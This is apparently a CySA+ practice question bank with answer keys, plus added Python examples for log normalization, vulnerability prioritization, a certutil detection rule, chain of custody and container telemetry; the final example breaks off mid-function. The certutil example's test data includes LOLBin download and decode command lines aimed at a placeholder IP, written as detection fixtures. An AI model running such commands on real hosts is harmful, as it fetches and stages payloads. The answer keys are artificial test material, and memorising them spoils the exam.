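Added example, not from the original page: a minimal normalization layer in Python that maps two differently shaped cloud records onto one schema, normalizes the outcome values (which the two sources encode differently), fails loudly when a required field is missing, and then runs a detection that reads only normalized fields. The raw records are constructed in the style of an AWS CloudTrail ConsoleLogin event and an Azure sign-in event with simplified field names; the schema names follow the ECS dotted convention but are an assumption of the example.

```python
import json
from collections import Counter

# Constructed raw records, simplified; field names differ per source on purpose.
RAW_EVENTS = [
    ("aws_cloudtrail", json.dumps({
        "eventTime": "2024-03-01T02:14:01Z", "eventName": "ConsoleLogin",
        "sourceIPAddress": "203.0.113.7",
        "userIdentity": {"type": "IAMUser", "userName": "alice"},
        "responseElements": {"ConsoleLogin": "Failure"}})),
    ("azure_signin", json.dumps({
        "createdDateTime": "2024-03-01T02:14:20Z", "activity": "Sign-in",
        "ipAddress": "203.0.113.7", "userPrincipalName": "alice@example.com",
        "status": {"errorCode": 50126}})),
    ("aws_cloudtrail", json.dumps({
        "eventTime": "2024-03-01T02:15:00Z", "eventName": "ConsoleLogin",
        "sourceIPAddress": "198.51.100.4",
        "userIdentity": {"type": "IAMUser", "userName": "bob"},
        "responseElements": {"ConsoleLogin": "Success"}})),
]

# Per-source parser map: normalized field -> dotted path into the raw record.
FIELD_MAPS = {
    "aws_cloudtrail": {
        "@timestamp": "eventTime", "source.ip": "sourceIPAddress",
        "user.name": "userIdentity.userName", "event.action": "eventName",
        "event.outcome": "responseElements.ConsoleLogin",
    },
    "azure_signin": {
        "@timestamp": "createdDateTime", "source.ip": "ipAddress",
        "user.name": "userPrincipalName", "event.action": "activity",
        "event.outcome": "status.errorCode",
    },
}
# Values need normalizing too: AWS says "Failure", Azure uses a non-zero errorCode.
OUTCOME_NORMALIZERS = {
    "aws_cloudtrail": lambda v: "failure" if v == "Failure" else "success",
    "azure_signin": lambda v: "success" if v == 0 else "failure",
}
REQUIRED = ("@timestamp", "source.ip", "user.name", "event.action", "event.outcome")


def get_path(obj, dotted):
    for key in dotted.split("."):
        if not isinstance(obj, dict) or key not in obj:
            return None
        obj = obj[key]
    return obj


def normalize(source, raw_json):
    """Parse one raw record into the common schema; raise instead of emitting a
    half-mapped event, because silent gaps are what broke the analytics."""
    if source not in FIELD_MAPS:
        raise ValueError(f"no parser for source {source!r}")
    raw = json.loads(raw_json)
    event = {"event.dataset": source}
    for norm_field, path in FIELD_MAPS[source].items():
        event[norm_field] = get_path(raw, path)
    missing = [f for f in REQUIRED if event.get(f) is None]
    if missing:
        raise ValueError(f"{source}: required fields not mapped: {missing}")
    event["event.outcome"] = OUTCOME_NORMALIZERS[source](event["event.outcome"])
    return event


def normalize_all(raw_events):
    return [normalize(source, raw) for source, raw in raw_events]


def failed_logins_by_ip(events):
    """A detection written once against the schema; it sees both clouds."""
    return dict(Counter(e["source.ip"] for e in events if e["event.outcome"] == "failure"))


if __name__ == "__main__":
    print(failed_logins_by_ip(normalize_all(RAW_EVENTS)))
```

The detection at the bottom is the payoff: once `source.ip` and `event.outcome` mean the same thing for every source, one rule counts the failed logins from 203.0.113.7 across AWS and Azure, which is exactly the cross-source correlation that an unmapped field silently breaks.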

776
Multi-Select · medium

A vulnerability manager is prioritizing remediation. Which factors should influence risk-based priority? (Choose three.)

Select 3 answers
A.Internet exposure of the affected asset
B.Alphabetical order of the CVE identifier
C.Known exploitation in the wild
D.Business criticality of the affected service
Answers: A, C, D

External reachability increases likelihood of attack.

Why this answer

Internet exposure of the affected asset is a critical factor because assets reachable from the public internet have a larger attack surface and are more likely to be targeted by automated scanners and exploit kits. Risk-based prioritization weighs the likelihood of exploitation, and an internet-facing system inherently faces a higher threat level than an internal-only asset. This aligns with the CVSS environmental metrics (Modified Attack Vector) and common vulnerability scoring frameworks that adjust severity based on network accessibility.

Exam trap

The CS0-003 exam often tests the misconception that all CVSS scores are equal regardless of context, but the trap here is that candidates might think alphabetical order or CVE age is relevant, when in fact only exploitability, exposure, and business impact drive true risk-based priority.
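Added example serving this question and questions 767 and 771 above, not from the original page: a small risk-based prioritizer in Python that ranks constructed findings by CVSS severity weighted for business criticality and multiplied by a likelihood factor built from known exploitation, public exploit code and internet exposure. The findings, the criticality weights and the likelihood increments are assumptions chosen for illustration; what the example shows is the ordering they produce, where the highest CVSS score lands last.

```python
# Constructed findings (not from a real scan). 'hosts' and 'age_days' are
# carried along only to show that they do not drive the ranking here.
FINDINGS = [
    {"id": "F1", "cvss": 9.8, "kev": False, "public_exploit": False,
     "internet_exposed": False, "criticality": "low", "hosts": 40, "age_days": 400},
    {"id": "F2", "cvss": 7.5, "kev": True, "public_exploit": True,
     "internet_exposed": True, "criticality": "high", "hosts": 2, "age_days": 12},
    {"id": "F3", "cvss": 8.1, "kev": False, "public_exploit": True,
     "internet_exposed": True, "criticality": "medium", "hosts": 5, "age_days": 60},
    {"id": "F4", "cvss": 5.3, "kev": False, "public_exploit": False,
     "internet_exposed": False, "criticality": "high", "hosts": 300, "age_days": 900},
]

# Weights are assumptions for the example, to be set by the organisation.
CRITICALITY_WEIGHT = {"high": 1.0, "medium": 0.7, "low": 0.4}
KEV_BONUS, PUBLIC_EXPLOIT_BONUS, EXPOSURE_BONUS = 1.5, 0.75, 1.0


def likelihood_factor(f):
    """Multiplier for how likely exploitation is. Exploitation in the wild
    dominates a mere public PoC, so the two are not added together."""
    factor = 1.0
    if f["kev"]:
        factor += KEV_BONUS
    elif f["public_exploit"]:
        factor += PUBLIC_EXPLOIT_BONUS
    if f["internet_exposed"]:
        factor += EXPOSURE_BONUS
    return factor


def risk_score(f):
    """Severity (CVSS) x business impact x likelihood, rounded for reporting."""
    return round(f["cvss"] * CRITICALITY_WEIGHT[f["criticality"]] * likelihood_factor(f), 2)


def rationale(f):
    reasons = [f"CVSS {f['cvss']}", f"{f['criticality']} criticality"]
    if f["kev"]:
        reasons.append("exploited in the wild")
    elif f["public_exploit"]:
        reasons.append("public exploit")
    if f["internet_exposed"]:
        reasons.append("internet-facing")
    return ", ".join(reasons)


def prioritize(findings):
    """Highest risk first; CVSS and then id break ties so the order is stable."""
    return sorted(findings, key=lambda f: (-risk_score(f), -f["cvss"], f["id"]))


if __name__ == "__main__":
    for f in prioritize(FINDINGS):
        print(f["id"], risk_score(f), rationale(f))
```

F1 carries the highest base score and affects the most hosts, yet ranks last: it is internal, on a low-criticality asset and has no known exploit. F2, a 7.5 that is internet-facing, on a critical service and in active exploitation, goes first. That inversion is the point of risk-based prioritization and of the three questions' answer keys.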

777
Drag & Drop · medium

Arrange the steps for a typical digital forensics investigation process.


Why this order

Digital forensics follows identification, preservation, collection, examination, and presentation.

778
Multi-Select · easy

An incident response team is conducting post-incident activities after containing a malware outbreak. Which TWO activities should be included in the lessons learned phase? (Choose TWO.)

Select 2 answers
A.Deleting all logs from the incident.
B.Conducting a root cause analysis.
C.Rewriting the organization's security policy from scratch.
D.Updating detection rules based on IOCs.
E.Patching all systems immediately.
AnswersB, D

Root cause analysis identifies why the incident occurred.

Why this answer

Lessons learned involves analyzing the incident to improve future response. Updating detection rules based on IOCs and conducting a root cause analysis are key activities.

779
Multi-Selectmedium

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Select 3 answers
A.-urlcache
B.-split
C.-encode
D.-decode
E.-verify
AnswersA, B, D

Used to download files from a URL.

Why this answer

The download pattern is `certutil -urlcache -split -f <URL> <output file>`: `-urlcache` makes certutil fetch the URL, `-split` causes the fetched content to be saved to the named output file rather than only to the URL cache, and `-f` forces an overwrite. `-decode` is the follow-on step when the payload was staged as base64 text: it turns the downloaded text file back into a binary. `-verify` is ordinary certificate checking, and `-encode` on its own is more associated with staging data for exfiltration than with fetching a payload, which is why the key is A, B and D. A rule should match both the `-flag` and `/flag` spellings case-insensitively and pair the flags with the presence of a URL in the command line to cut false positives from legitimate certificate-cache operations.
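The matching logic described above, as an added example that is not part of the original question bank: the Sigma-style selection (image ends with certutil.exe, command line contains one of the three flags) written as a small Python classifier, with a URL check as the false-positive guard. The command lines are constructed samples, not real process-creation records, and the output labels are this example's own.

```python
import re

# Arguments the question's key treats as download indicators (answers A, B, D).
# certutil accepts "-flag" and "/flag" forms and is case-insensitive, so every
# token is normalised before it is compared.
DOWNLOAD_FLAGS = {"urlcache", "split", "decode"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def certutil_indicators(cmdline: str) -> dict:
    """Return the indicators found in one process-creation command line.

    Equivalent to a Sigma selection of
      Image|endswith: '\\certutil.exe'
      CommandLine|contains: ['urlcache', 'split', 'decode']
    Returns {} when the image is not certutil at all.
    """
    tokens = cmdline.split()
    if not tokens:
        return {}
    image = tokens[0].strip('"').lower()
    if image not in ("certutil", "certutil.exe") and not image.endswith("\\certutil.exe"):
        return {}
    flags = {t.lstrip("-/").lower() for t in tokens[1:] if t and t[0] in "-/"}
    return {
        "flags": sorted(DOWNLOAD_FLAGS & flags),
        "url": bool(URL_RE.search(cmdline)),
    }


def classify(cmdline: str) -> str:
    """Map the indicators to a triage label (labels are this example's own)."""
    ind = certutil_indicators(cmdline)
    if not ind or not ind["flags"]:
        return "benign"
    if "urlcache" in ind["flags"] and ind["url"]:
        return "download"            # -urlcache [-split] -f <URL> <file>
    if "decode" in ind["flags"]:
        return "decode-staged-file"  # turning a base64 text drop into a binary
    return "suspicious"              # a listed flag without its usual companions


# Constructed command lines (not taken from a real host) covering the cases the
# rule must separate.
SAMPLES = {
    "download": r'certutil.exe -urlcache -split -f http://198.51.100.7/update.bin C:\Users\Public\update.bin',
    "download_slash": r'"C:\Windows\System32\certutil.exe" /urlcache /f https://198.51.100.7/p.txt C:\Users\Public\p.txt',
    "decode": r'certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe',
    "verify": r'certutil -verify C:\certs\server.cer',
    "other_image": r'powershell.exe -urlcache',
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:15} -> {classify(cmd)}")
```

Run it as a script to see one label per sample; feed it your own process-creation command lines (Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled) to check the rule before deploying the Sigma version.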

780
Multi-Selectmedium

Which TWO of the following are essential steps in the incident response phase of 'Containment, Eradication, and Recovery'? (Choose two.)

Select 2 answers
A.Reimage all systems in the environment
B.Disconnect the organization from the internet
C.Remove malicious files and artifacts from affected systems
D.Collect and preserve forensic evidence
E.Isolate affected systems from the network
AnswersC, E

Eradication removes the threat.

Why this answer

Option C is correct because removing malicious files and artifacts from affected systems is a core step in the eradication phase, ensuring that the root cause of the incident is eliminated and the system can be safely restored to normal operations. This step directly addresses the removal of malware, persistence mechanisms, and unauthorized changes that were identified during analysis. Option E is correct because isolating affected systems from the network is the defining containment action: it stops the malware from spreading or reaching its command-and-control infrastructure while eradication and recovery proceed.

Exam trap

CompTIA often tests the distinction between 'containment' actions (like isolation) and 'eradication' actions (like removal of artifacts). The trap is option D: evidence collection runs alongside these phases and supports the investigation, but it does not neutralise the threat, so it is not one of the essential containment or eradication steps the question asks for.

781
MCQeasy

During a post-compromise review, a laptop may contain evidence for a legal investigation. What should the responder document during acquisition?

A.Only the laptop colour
B.Only the ticket priority
C.Only the user's job title
D.Who collected it, when, where, hash values, transfer details, and storage location
AnswerD

Chain of custody records evidence handling and integrity from collection onward.

Why this answer

Option D is correct because forensic acquisition requires a complete chain of custody to ensure evidence integrity and admissibility in legal proceedings. Documenting who collected the evidence, when and where it was collected, how it was acquired (e.g., the write blocker used), cryptographic hash values (e.g., SHA-256) taken at acquisition to verify data integrity, transfer details (each hand-off between custodians, with names, times, purpose and signatures), and storage location provides a defensible record that meets legal and organizational standards.

Exam trap

CompTIA often tests the misconception that minimal documentation (like color or job title) is sufficient, when in fact comprehensive chain-of-custody details are required for legal defensibility.

How to eliminate wrong answers

Option A is wrong because documenting only the laptop color provides no forensic value and fails to establish chain of custody or evidence integrity. Option B is wrong because documenting only the ticket priority is irrelevant to forensic acquisition and does not capture any evidence-handling details. Option C is wrong because documenting only the user's job title ignores critical acquisition metadata such as collector identity, timestamps, hash values, and storage location, making the evidence indefensible in court.
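The chain-of-custody record described in question 781, as an added example that is not part of the original question bank: a small Python structure holding the fields the correct answer lists, an acquisition routine that fixes the SHA-256 at collection time, a transfer log that re-hashes the copy at every hand-off, and a verification check. The evidence identifier, people and locations are placeholders, and the "image" is a constructed byte string standing in for a write-blocked disk image.

```python
import hashlib
import json
from dataclasses import dataclass, field, asdict


@dataclass
class CustodyRecord:
    """One evidence item's chain-of-custody entry (fields from the question)."""
    evidence_id: str
    description: str
    collected_by: str
    collected_at: str        # ISO-8601 timestamp with timezone offset
    collected_where: str
    sha256: str              # hash of the acquired image, fixed at acquisition
    storage_location: str
    transfers: list = field(default_factory=list)   # every hand-off, in order


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def acquire(evidence_id, description, image, collected_by, collected_at,
            collected_where, storage_location):
    """Create the record at the moment of acquisition; the hash is taken here."""
    return CustodyRecord(evidence_id, description, collected_by, collected_at,
                         collected_where, sha256_hex(image), storage_location)


def transfer(record, released_by, received_by, at, purpose, image=None):
    """Log a hand-off. When the copy being handed over is supplied, re-hash it
    so a transfer that altered the evidence is recorded rather than hidden."""
    entry = {"released_by": released_by, "received_by": received_by,
             "at": at, "purpose": purpose}
    if image is not None:
        entry["sha256_at_transfer"] = sha256_hex(image)
        entry["integrity_ok"] = entry["sha256_at_transfer"] == record.sha256
    record.transfers.append(entry)
    return record


def verify(record, image) -> bool:
    """True when the current copy still matches the acquisition hash."""
    return sha256_hex(image) == record.sha256


def to_json(record) -> str:
    """Serialise the record for the case file."""
    return json.dumps(asdict(record), indent=2, sort_keys=True)


# Constructed stand-in for a disk image; a real acquisition would hash the
# write-blocked device or the resulting E01/raw file.
IMAGE = b"constructed laptop image bytes -- not a real acquisition" * 1024

if __name__ == "__main__":
    rec = acquire("LT-0042", "Laptop SSD image", IMAGE, "J. Doe (IR)",
                  "2024-05-01T16:55:00+00:00", "Desk 4B, HQ floor 2",
                  "Evidence safe 1, shelf B")
    transfer(rec, "J. Doe (IR)", "K. Lee (forensics)",
             "2024-05-02T09:10:00+00:00", "examination", IMAGE)
    print(to_json(rec))
    print("intact:", verify(rec, IMAGE))
```

The value of hashing at every hand-off is that a mismatch is attributed to a specific custodian and interval rather than discovered only when the evidence is challenged in court.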

782
MCQeasy

A security analyst is reviewing vulnerability scan results and sees a critical vulnerability on a web server with a CVSS score of 9.8. The server is a legacy system that cannot be patched without causing application downtime. The business requires the application to remain available. Which of the following is the BEST course of action?

A.Remove the system from the network.
B.Disable the vulnerable service on the server.
C.Accept the risk and do nothing.
D.Implement a virtual patch using a web application firewall.
AnswerD

Virtual patching via WAF mitigates vulnerability while maintaining availability.

Why this answer

Option D is correct because a virtual patch via a web application firewall (WAF) can inspect and block exploit attempts against the vulnerability without modifying the legacy server's code or binaries. This allows the business-critical application to remain available while mitigating the 9.8 CVSS risk at the network layer, typically using signature-based or behavioral rules to intercept malicious payloads targeting the flaw.

Exam trap

CompTIA often tests the misconception that a critical vulnerability always requires immediate patching or removal, when in reality compensating controls like a WAF virtual patch are the preferred risk treatment for legacy systems that cannot be taken offline.

How to eliminate wrong answers

Option A is wrong because removing the system from the network would cause exactly the application downtime the business has said must be avoided, and it is an overly drastic measure when a compensating control exists. Option B is wrong because disabling the vulnerable service on the server would likely break the application's functionality, as the service is presumably the core web server process, and this also fails to meet the business requirement for availability. Option C is wrong because accepting the risk and doing nothing ignores the critical severity (CVSS 9.8) and the high likelihood of exploitation, which is irresponsible without first attempting a compensating control like a WAF.

783
MCQmedium

A security analyst needs to report a critical vulnerability to the executive team. The report should balance technical details with business impact. Which of the following is the BEST approach?

A.Simply state the vulnerability exists and a patch is available
B.Write a 50-page report covering every technical detail and mitigation option
C.Explain the vulnerability in terms of potential business impact and recommended risk treatment
D.Provide a full technical analysis of the vulnerability and remediation steps
AnswerC

This aligns with executive needs: risk, cost, and decision-making.

Why this answer

Option C is correct because it directly addresses the core requirement of balancing technical details with business impact. For a critical vulnerability, the executive team needs to understand the potential financial, operational, and reputational risks, not just the technical flaw. This approach aligns with the NIST risk management framework, which emphasizes communicating risk in terms of business context to enable informed decision-making on risk treatment (e.g., accept, mitigate, transfer, avoid).

Exam trap

CompTIA often tests the distinction between technical completeness and audience-appropriate communication, trapping candidates who choose Option D because they mistake 'full technical analysis' for the best approach, when the question explicitly requires balancing technical details with business impact for an executive audience.

How to eliminate wrong answers

Option A is wrong because simply stating a vulnerability exists and a patch is available lacks the necessary business context and risk assessment; executives need to understand the potential impact on operations, compliance, and revenue to prioritize remediation. Option B is wrong because a 50-page report with every technical detail is excessive and counterproductive for an executive audience, who require concise, actionable summaries focused on risk and business outcomes, not exhaustive technical minutiae. Option D is wrong because providing a full technical analysis and remediation steps, while thorough, fails to translate the vulnerability into business terms; it omits the critical risk treatment recommendation and does not help executives weigh the cost of remediation against potential business disruption.

784
Multi-Selectmedium

Which conditions should push a vulnerability higher in the remediation queue? (Choose three.)

Select 3 answers
A.The asset supports a critical business process
B.The affected asset is internet-facing
C.Exploitation is observed in the wild
D.The CVE number is easy to remember
AnswersA, B, C

Business impact increases priority.

Why this answer

A is correct because assets supporting critical business processes have a higher impact on organizational operations if compromised. Vulnerability management prioritization frameworks, such as those aligned with the CVSS environmental score, assign greater weight to business criticality. Remediating vulnerabilities on these assets first reduces the risk of significant downtime, data loss, or regulatory non-compliance. B and C are correct because they raise the likelihood side of the risk equation: an internet-facing asset is reachable by opportunistic scanning, and observed exploitation in the wild (for example, a listing in CISA's Known Exploited Vulnerabilities catalog) means working exploit code is already in use.

Exam trap

The CS0-003 exam often tests the distinction between factors that increase likelihood (e.g., internet-facing, active exploitation) versus factors that increase impact (e.g., critical business process), and candidates may mistakenly prioritize vulnerabilities based solely on CVSS base score without considering environmental or threat intelligence inputs.
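A scoring routine that applies the factors from questions 776 and 784, as an added example that is not part of the original question bank: exposure and active exploitation scale likelihood, business criticality scales impact, and the identifier is used only as a deterministic tie-breaker, so the "alphabetical order" distractor has no effect. The multipliers and the four findings are constructed assumptions, not a published scoring standard or real scan output.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    finding_id: str
    cvss_base: float            # vendor/NVD base score, context-free
    internet_exposed: bool      # likelihood: reachable from the public internet
    exploited_in_wild: bool     # likelihood: e.g. listed in CISA's KEV catalogue
    business_criticality: int   # impact: 1 = low, 2 = important, 3 = critical process


# Multipliers are illustrative assumptions. The point is only that exposure and
# active exploitation scale likelihood while business criticality scales impact,
# and that the identifier itself contributes nothing.
EXPOSURE_MULTIPLIER = 2.0
EXPLOITED_MULTIPLIER = 3.0


def risk_score(f: Finding) -> float:
    likelihood = 1.0
    if f.internet_exposed:
        likelihood *= EXPOSURE_MULTIPLIER
    if f.exploited_in_wild:
        likelihood *= EXPLOITED_MULTIPLIER
    impact = f.cvss_base * f.business_criticality
    return round(likelihood * impact, 1)


def prioritize(findings):
    """Highest risk first; the id is only a deterministic tie-breaker."""
    return [f.finding_id
            for f in sorted(findings, key=lambda f: (-risk_score(f), f.finding_id))]


# Constructed findings. Note that the highest CVSS base score is NOT the top priority.
FINDINGS = [
    Finding("f1-internal-db", 9.8, False, False, 1),
    Finding("f2-public-vpn", 7.5, True, True, 3),
    Finding("f3-public-web", 8.1, True, False, 2),
    Finding("f4-internal-erp", 5.3, False, True, 3),
]

if __name__ == "__main__":
    for fid in prioritize(FINDINGS):
        f = next(x for x in FINDINGS if x.finding_id == fid)
        print(f"{fid:16} cvss={f.cvss_base:<4} risk={risk_score(f)}")
```

The internal database with the 9.8 base score lands last: nothing reaches it from outside, no exploitation is known, and it supports a low-criticality process. The 7.5 on the public VPN with active exploitation and a critical dependency lands first.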

785
MCQeasy

Which of the following best describes the purpose of a threat intelligence report at the operational level?

A.Offer detailed analysis of threat actor TTPs for specific campaigns
B.Deliver technical indicators like IoCs to SOC analysts
C.Provide high-level trends to executive leadership
D.Summarize geopolitical risks affecting the organization
AnswerA

Operational intelligence provides actionable insights for defenders.

Why this answer

Operational intelligence focuses on specific campaigns, tools, and techniques to inform defenders' actions.

786
MCQmedium

A vulnerability report for a critical application shows that a high-risk vulnerability has been accepted by the business owner. What should the analyst include in the report to document this decision?

A.A formal risk acceptance form signed by the business owner with a justification
B.The technical details of the vulnerability only
C.An automatic closure of the vulnerability ticket
D.A note that the vulnerability is low priority
AnswerA

This meets compliance and governance requirements.

Why this answer

Proper risk acceptance documentation requires a formal sign-off by the risk owner, typically including a justification and acceptance date.

787
Multi-Selecthard

A vulnerability assessment has identified multiple issues. Which THREE actions are appropriate steps in the remediation process? (Choose three.)

Select 3 answers
A.Create a change request to apply the necessary patch or configuration change
B.Rescan the system immediately to confirm the vulnerability
C.Uninstall the affected software or service to remove the vulnerability
D.Research the vulnerability to understand its impact and remediation
E.Verify the remediation by performing a follow-up scan or test
AnswersA, D, E

Formal change management helps track and approve modifications.

Why this answer

Option A is correct because in a structured remediation process, applying a patch or configuration change requires a formal change request to ensure proper testing, approval, and documentation, minimizing the risk of unintended disruptions. This aligns with change management best practices in vulnerability management, where uncoordinated changes can introduce new vulnerabilities or break existing functionality.

Exam trap

The CS0-003 exam often tests the misconception that immediate rescanning or drastic removal are valid remediation steps, when in fact the correct sequence requires research, controlled change implementation, and verification.

788
Multi-Selecteasy

An incident response team is analyzing indicators of compromise (IOCs) from a phishing campaign. Which THREE of the following are commonly used IOC types? (Select THREE.)

Select 3 answers
A.CPU registers
B.IP addresses
C.Domain names
D.Software version numbers
E.File hashes
AnswersB, C, E

IP addresses are common IOCs.

Why this answer

Common IOC types include IP addresses, file hashes, domains, URLs, and email indicators. Software versions are not typically IOCs.

789
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate?

A.The SIEM parser is always broken
B.A scheduled password rotation completed successfully
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The file share requires more storage capacity
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

The deception credential is a honeytoken—a fake credential placed in a file share to detect unauthorized use. Since no legitimate user should know it, any authentication attempt using it indicates an attacker has accessed the file share (credential access) and is attempting to move laterally (lateral movement). This warrants high-priority investigation because it directly signals a breach in progress.

Exam trap

The CS0-003 exam often tests the distinction between a detection artifact (like a honeytoken) and a configuration issue (like a broken parser), so candidates mistakenly attribute the alert to a technical failure rather than recognizing it as a deliberate security control triggering on malicious activity.

How to eliminate wrong answers

Option A is wrong because a broken SIEM parser would cause missing or malformed logs, not the generation of an authentication event using a deception credential; the detection itself is valid. Option B is wrong because a scheduled password rotation would change the credential's password, but the deception credential is a static honeytoken not subject to rotation, and its use would still be malicious regardless of rotation status. Option D is wrong because storage capacity on the file share has no bearing on an authentication attempt with a credential nobody should be using.

790
MCQeasy

Which of the following vulnerability scanning tools is open source and commonly used for network vulnerability assessment?

A.Nessus
B.Qualys
C.Rapid7 InsightVM
D.OpenVAS
AnswerD

OpenVAS is open source and widely used.

Why this answer

OpenVAS is a well-known open-source vulnerability scanner.

791
MCQmedium

A security analyst at a financial institution is responsible for vulnerability management. The company has a policy that all critical vulnerabilities must be remediated within 72 hours. The weekly vulnerability scan identifies a critical vulnerability on a file server that hosts sensitive customer data. The vulnerability is a remote code execution in the operating system. The server is running a legacy OS that is no longer supported by the vendor. The system owner states that the application on the server cannot be migrated to a newer OS for at least six months. The server cannot be taken offline because it is used by the compliance team for daily audits. Which of the following should the analyst recommend to best address the risk?

A.Remove the server from the network immediately.
B.Implement compensating controls such as network segmentation and host-based firewall rules.
C.Accept the risk and document the exception.
D.Apply a custom patch developed by the manufacturer.
AnswerB

Reduces risk while awaiting migration.

Why this answer

Option B is correct because when a critical vulnerability cannot be patched due to legacy OS constraints, compensating controls are the best approach to reduce risk. Network segmentation isolates the server from untrusted hosts, and host-based firewall rules restrict inbound/outbound traffic to only necessary ports and IPs, mitigating the remote code execution vector without taking the server offline.

Exam trap

CompTIA often tests the concept that compensating controls are the appropriate response when patching is impossible and business continuity is critical, tricking candidates into choosing risk acceptance (C) without considering that compensating controls must be implemented first.

How to eliminate wrong answers

Option A is wrong because immediately removing the server from the network would halt compliance audits, violating business requirements and potentially causing regulatory issues; it is an extreme measure not aligned with risk acceptance or compensating controls. Option C is wrong because accepting risk and documenting an exception without implementing any technical safeguards ignores the policy requiring remediation within 72 hours and leaves sensitive customer data exposed to remote code execution. Option D is wrong because the OS is no longer supported by the vendor, so no custom patch is available; applying an unsupported or unofficial patch could introduce instability or security flaws and is not a recommended practice.

792
MCQhard

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

A.Process hollowing
B.Reflective DLL injection
C.API hooking
D.DLL injection
AnswerA

Correct. Process hollowing replaces a legitimate process's in-memory code with malicious code; the original image stays untouched on disk, so no malicious file is written.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, unmapping or overwriting its memory with malicious code, and resuming it. In a memory dump this shows as executable memory whose contents no longer match the file the process claims to be backed by, with no malicious executable on disk. Reflective DLL injection (B) also leaves nothing on disk, but it loads a library into an already-running process rather than replacing the host process's image; the page's phrasing (a process running inside another process's memory space) is the hollowing case.

793
MCQeasy

An analyst needs to identify which process on a Windows system is making outbound connections to the internet. Which tool should be used?

A.netstat -an
B.Task Manager
C.Resource Monitor
D.Performance Monitor
AnswerC

Displays network activity per process.

Why this answer

Resource Monitor (resmon.exe) provides a real-time view of network activity, including which processes are making outbound TCP and UDP connections, along with the remote addresses and ports. Unlike netstat, it directly associates network connections with specific process names and allows filtering by process, making it the most efficient tool for identifying the exact process responsible for outbound internet traffic.

Exam trap

CompTIA often tests the distinction between tools that show aggregate network usage (Task Manager) versus those that show per-connection process mapping (Resource Monitor), leading candidates to choose Task Manager because they associate it with network activity without realizing it lacks connection-level detail.

How to eliminate wrong answers

Option A is wrong because netstat -an shows all active connections and listening ports but does not display the process name or PID by default; without the -b or -o flags, it cannot identify which process owns a connection. Option B is wrong because Task Manager's default view shows CPU, memory, disk, and network utilization per process, but it does not list individual outbound connections or remote addresses, only aggregate network usage. Option D is wrong because Performance Monitor is designed for long-term performance logging and analysis of system counters, not for real-time identification of specific process-to-remote-address connections.

794
MCQeasy

Which of the following is a key performance indicator (KPI) for measuring the efficiency of patch management?

A.Mean time to respond (MTTR)
B.Number of open vulnerabilities
C.Phishing simulation click rate
D.Patch SLA compliance %
AnswerD

Correct. It directly measures adherence to patching deadlines.

Why this answer

Patch SLA compliance percentage measures how often patches are applied within the defined service level agreement, indicating the effectiveness of patch management processes.

795
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful?

A.Only user password age reports
B.Only physical datacenter access logs
C.Container runtime events, Kubernetes audit logs, and network flow from the pod
D.Only monthly vulnerability scan summaries
AnswerC

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., `docker events` or CRI-O logs) capture the unexpected shell execution and host filesystem mount. Kubernetes audit logs record the API calls against the pod, such as a `pods/exec` request or a pod spec granting a host path mount, so they show which identity started the shell and whether it came through the API server. Network flow logs from the pod (e.g., via Calico or Cilium) show the outbound connections to the unknown IP, linking the external communication to the compromised container.

Together, these three telemetry sources provide the complete chain of events needed for root-cause analysis.

Exam trap

The CS0-003 exam often tests the misconception that a single log source (e.g., only network flows) is sufficient for root-cause analysis, when in reality a combination of container runtime, Kubernetes audit, and network telemetry is required to reconstruct the full attack chain.

How to eliminate wrong answers

Option A is wrong because user password age reports are irrelevant to container workload activity; they track local user account password expiration policies and cannot capture runtime events, mounts, or network flows inside a pod. Option B is wrong because physical datacenter access logs record who entered the facility, not what happens inside a container; they provide no visibility into shell execution, filesystem mounts, or outbound connections from a workload. Option D is wrong because monthly vulnerability scan summaries describe weaknesses that might exist, not what actually happened; they carry no record of the shell, the mount, or the connection.
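The three-source correlation described in question 795, as an added example that is not part of the original question bank: runtime events, Kubernetes audit entries and flow records for one pod are pivoted on the pod name into a single timeline, and each source answers the question it is best placed to answer (was a shell started, was the host filesystem mounted, did the shell come through the API and as whom, where did the pod talk to). The telemetry is constructed with simplified field names, not real CRI, audit or CNI output, and the allow-listed destination is an assumption.

```python
from datetime import datetime

# Constructed telemetry for one pod; field names are simplified stand-ins for
# what CRI runtime events, Kubernetes audit entries and CNI flow logs carry.
RUNTIME_EVENTS = [
    {"ts": "2024-05-01T10:02:11Z", "pod": "billing-api-7d9f", "kind": "exec", "detail": "/bin/sh"},
    {"ts": "2024-05-01T10:02:30Z", "pod": "billing-api-7d9f", "kind": "mount", "detail": "/ -> /mnt/host"},
    {"ts": "2024-05-01T10:01:00Z", "pod": "billing-api-7d9f", "kind": "exec", "detail": "/app/server"},
]
AUDIT_EVENTS = [
    {"ts": "2024-05-01T10:02:10Z", "verb": "create", "subresource": "exec", "namespace": "billing",
     "pod": "billing-api-7d9f", "user": "system:serviceaccount:ci:deployer"},
]
FLOWS = [
    {"ts": "2024-05-01T10:03:05Z", "src_pod": "billing-api-7d9f", "dst_ip": "203.0.113.80", "dst_port": 4444, "bytes": 9000},
    {"ts": "2024-05-01T10:01:20Z", "src_pod": "billing-api-7d9f", "dst_ip": "10.20.0.15", "dst_port": 5432, "bytes": 2400},
]
KNOWN_DESTINATIONS = {"10.20.0.15"}   # assumed allow-list for this workload (its database)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/ash"}


def ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def pod_timeline(pod, runtime, audit, flows):
    """Merge the three sources into one time-ordered list of (time, source, summary)."""
    rows = []
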